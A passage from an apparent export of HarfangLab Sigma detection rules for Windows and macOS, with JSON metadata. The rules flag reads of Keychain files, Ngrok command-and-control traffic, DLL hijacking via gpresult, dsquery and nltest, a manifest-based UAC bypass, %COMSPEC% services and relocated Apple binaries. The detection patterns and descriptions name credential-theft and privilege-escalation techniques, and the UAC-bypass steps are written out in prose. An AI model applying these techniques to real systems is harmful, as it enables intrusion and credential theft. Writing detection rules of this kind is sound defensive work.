"content": "title: Suspicious Access to System Keychain\nid: 5a7758ea-0069-4dd5-9f5d-4d478a464ae5\ndescription: |\n Detects a suspicious access to the system Keychain files.\n Adversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2024/09/26\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_common_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_common_files:\n Kind: 'read'\n Path:\n - '/Library/Keychains/*.keychain'\n - '/Library/Keychains/*.keychain-db'\n - '/private/var/*/Library/Keychains/*.keychain'\n - '/private/var/*/Library/Keychains/*.keychain-db'\n - '/Network/Library/Keychains/*.keychain'\n - '/Network/Library/Keychains/*.keychain-db'\n ProcessImage|contains: '?'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/usr/local/bin/'\n # process\n - '/osascript'\n\n selection_susp_process:\n ProcessImage: '/bin/cat'\n\n filter_security:\n ProcessImage: '/usr/bin/security'\n\n filter_ldapsearch:\n ProcessImage: 
'/usr/bin/ldapsearch'\n\n filter_codesign:\n ProcessImage: '/usr/bin/codesign'\n\n exclusion_process_pkinstall:\n - ProcessAncestors|contains: '/private/tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessImage|contains: '/private/tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_process_adobe:\n ProcessAncestors|contains: '/private/tmp/????????-????-????-????-?????????????/Creative Cloud Installer.app/Contents/MacOS/Install'\n\n exclusion_process_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/opt/homebrew/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_folder_signed:\n ProcessImage|startswith: '/users/'\n ProcessSigned: 'true'\n\n adhoc_signed:\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n\n condition: all of selection_common_* and 1 of selection_susp_* and not 1 of filter_* and not 1 of exclusion_process_* and not (exclusion_folder_signed and not adhoc_signed)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a7758ea-0069-4dd5-9f5d-4d478a464ae5",
"rule_name": "Suspicious Access to System Keychain",
"rule_description": "Detects suspicious access to the system Keychain files.\nAdversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\nIt is recommended to verify whether the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a871461-061c-41ec-b776-f11c897473f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603773Z",
"creation_date": "2026-03-23T11:45:34.603776Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf",
"https://ngrok.com/blog-post/new-ngrok-domains",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_url_access_ngrok.yml",
"content": "title: HTTP request to Ngrok Service\nid: 5a871461-061c-41ec-b776-f11c897473f4\ndescription: |\n Detects an HTTP request to Ngrok's services by utilizing free static domains provided by Ngrok.\n Adversaries may use an existing, legitimate external Web service like Ngrok as a means to sending commands to and receiving output from a compromised system over HTTP channel.\n It is recommended to investigate the process at the origin of the HTTP request to determine whether the communication with Ngrok's services is legitimate.\nreferences:\n - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\n - https://ngrok.com/blog-post/new-ngrok-domains\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/04/02\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost|endswith:\n - '.ngrok-free.app'\n - '.ngrok-free.dev'\n - '.ngrok.app'\n - '.ngrok.dev'\n - '.ngrok.io'\n\n # https://newtonpaul.com/svchost-analysis-and-internet-sharing-triage/\n exclusion_sharedaccess:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a871461-061c-41ec-b776-f11c897473f4",
"rule_name": "HTTP request to Ngrok Service",
"rule_description": "Detects an HTTP request to Ngrok's services via the free static domains provided by Ngrok.\nAdversaries may use an existing, legitimate external web service such as Ngrok as a means of sending commands to and receiving output from a compromised system over an HTTP channel.\nIt is recommended to investigate the process at the origin of the HTTP request to determine whether the communication with Ngrok's services is legitimate.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a89c980-2d01-467d-95ed-eaa6c2a7bcd9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597152Z",
"creation_date": "2026-03-23T11:45:34.597157Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597170Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpresult.yml",
"content": "title: DLL Hijacking via gpresult.exe\nid: 5a89c980-2d01-467d-95ed-eaa6c2a7bcd9\ndescription: |\n Detects potential Windows DLL Hijacking via gpresult.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpresult.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n - '\\Secur32.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a89c980-2d01-467d-95ed-eaa6c2a7bcd9",
"rule_name": "DLL Hijacking via gpresult.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpresult.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a9dbbfc-6cc7-4475-b35f-03eccfad4915",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594422Z",
"creation_date": "2026-03-23T11:45:34.594426Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594434Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsquery.yml",
"content": "title: DLL Hijacking via dsquery.exe\nid: 5a9dbbfc-6cc7-4475-b35f-03eccfad4915\ndescription: |\n Detects potential Windows DLL Hijacking via dsquery.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsquery.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\atl.dll'\n - '\\dsprop.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a9dbbfc-6cc7-4475-b35f-03eccfad4915",
"rule_name": "DLL Hijacking via dsquery.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsquery.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5aaebba7-01f9-43b3-8924-5ea1e6098157",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588252Z",
"creation_date": "2026-03-23T11:45:34.588256Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588263Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nltest.yml",
"content": "title: DLL Hijacking via nltest.exe\nid: 5aaebba7-01f9-43b3-8924-5ea1e6098157\ndescription: |\n Detects potential Windows DLL Hijacking via nltest.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nltest.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\NTDSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5aaebba7-01f9-43b3-8924-5ea1e6098157",
"rule_name": "DLL Hijacking via nltest.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nltest.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ae07f49-3dd1-490d-affc-811f90f709d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074093Z",
"creation_date": "2026-03-23T11:45:34.074095Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_tzsync.yml",
"content": "title: UAC Bypass Executed via tzsync\nid: 5ae07f49-3dd1-490d-affc-811f90f709d7\ndescription: |\n Detects a UAC bypass via a renamed tzsync.exe and a missing manifest.\n A manifest file is an XML document embedded in or placed alongside an executable that defines application metadata, including runtime behavior, dependency paths, and privilege requirements.\n This UAC bypass method involves creating a malicious manifest file that specifies a custom path for loading the cryptbase.dll DLL.\n When migwiz.exe (renamed tzsync.exe), which lacks an embedded manifest and has the autoElevate attribute, is executed, it loads the attacker's DLL from the specified path with elevated privileges.\n This allows the attacker to achieve privilege escalation without triggering a UAC prompt.\n This approach combines manifest manipulation and DLL hijacking to bypass UAC and achieve privilege escalation.\n It is recommended to investigate the DLL file loaded to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/01/25\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 'Windows\\migwiz.exe'\n #OriginalFileName: 'tzsync.exe'\n ImageLoaded|endswith: '\\cryptbase.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ae07f49-3dd1-490d-affc-811f90f709d7",
"rule_name": "UAC Bypass Executed via tzsync",
"rule_description": "Detects a UAC bypass via a renamed tzsync.exe and a missing manifest.\nA manifest file is an XML document embedded in or placed alongside an executable that defines application metadata, including runtime behavior, dependency paths, and privilege requirements.\nThis UAC bypass method involves creating a malicious manifest file that specifies a custom path for loading the cryptbase.dll DLL.\nWhen migwiz.exe (renamed tzsync.exe), which lacks an embedded manifest and has the autoElevate attribute, is executed, it loads the attacker's DLL from the specified path with elevated privileges.\nThis allows the attacker to achieve privilege escalation without triggering a UAC prompt.\nThis approach combines manifest manipulation and DLL hijacking to bypass UAC and achieve privilege escalation.\nIt is recommended to investigate the DLL file loaded to determine its legitimacy.\n",
"rule_creation_date": "2021-01-25",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ae1d32b-e95b-4ed0-a035-5b1761a4bd14",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082038Z",
"creation_date": "2026-03-23T11:45:34.082040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082044Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lexfo.fr/tag/cobalt-strike/",
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_001_service_comspec.yml",
"content": "title: Suspicious Service Using %COMSPEC% Environment Variable\nid: 5ae1d32b-e95b-4ed0-a035-5b1761a4bd14\ndescription: |\n Detects a service creation whose command-line contains the %COMSPEC% environment variable.\n Adversaries may use %COMSPEC% as a replacement for cmd.exe when creating a service, the environment variable being replaced at runtime.\n It is recommended to analyze the behavior of the process responsible for the service creation and check if the service has been started.\nreferences:\n - https://lexfo.fr/tag/cobalt-strike/\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2024/01/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ServiceCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n Details|contains: \"%COMSPEC%\"\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ae1d32b-e95b-4ed0-a035-5b1761a4bd14",
"rule_name": "Suspicious Service Using %COMSPEC% Environment Variable",
"rule_description": "Detects a service creation whose command-line contains the %COMSPEC% environment variable.\nAdversaries may use %COMSPEC% as a replacement for cmd.exe when creating a service, the environment variable being replaced at runtime.\nIt is recommended to analyze the behavior of the process responsible for the service creation and check if the service has been started.\n",
"rule_creation_date": "2024-01-31",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5afa7a78-99c9-4aa8-9b87-6ea4220b19d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.779645Z",
"creation_date": "2026-03-23T11:45:34.617144Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617151Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/003/"
],
"name": "t1036_003_platform_binary_copy_macos.yml",
"content": "title: Apple Binary Executed from Suspicious Folder\nid: 5afa7a78-99c9-4aa8-9b87-6ea4220b19d6\ndescription: |\n Detects a platform binary being executed from an uncommon folder.\n Apple's signed binaries, also known as platform binaries, should only be executed from system directories.\n Adversaries may copy and execute such binaries in another folder in order to bypass security solutions.\n It is recommended to analyze the process that copied the binary as well as commands that were executed.\nreferences:\n - https://attack.mitre.org/techniques/T1036/003/\ndate: 2024/07/22\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n IsPlatformBinary: 'true'\n\n exclusion_installer:\n - Image: '/Volumes/*/Install macOS *.app/Contents/MacOS/InstallAssistant_springboard'\n SignatureSigningId: 'com.apple.InstallAssistant.macOS*'\n - Image: '/Volumes/*/Install macOS *.app/Contents/MacOS/createinstallmedia'\n SignatureSigningId: 'com.apple.createinstallmedia'\n\n exclusion_chrome_updater:\n - Image: '/Volumes/Google Chrome * universal Update/.patch/goobspatch'\n SignatureSigningId: 'goobspatch'\n - Image: '/Volumes/Google Chrome * universal Update/.patch/xzdec'\n SignatureSigningId: 'xzdec'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5afa7a78-99c9-4aa8-9b87-6ea4220b19d6",
"rule_name": "Apple Binary Executed from Suspicious Folder",
